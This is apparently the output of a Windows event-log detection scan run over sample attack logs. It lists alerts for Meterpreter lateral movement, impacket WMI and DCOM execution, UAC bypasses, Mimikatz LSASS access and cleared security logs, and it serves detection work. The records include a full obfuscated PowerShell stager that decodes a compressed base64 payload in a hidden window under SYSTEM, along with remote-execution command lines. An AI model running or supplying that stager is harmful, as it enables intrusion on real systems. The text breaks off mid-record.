Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: 
""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child 
Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: 
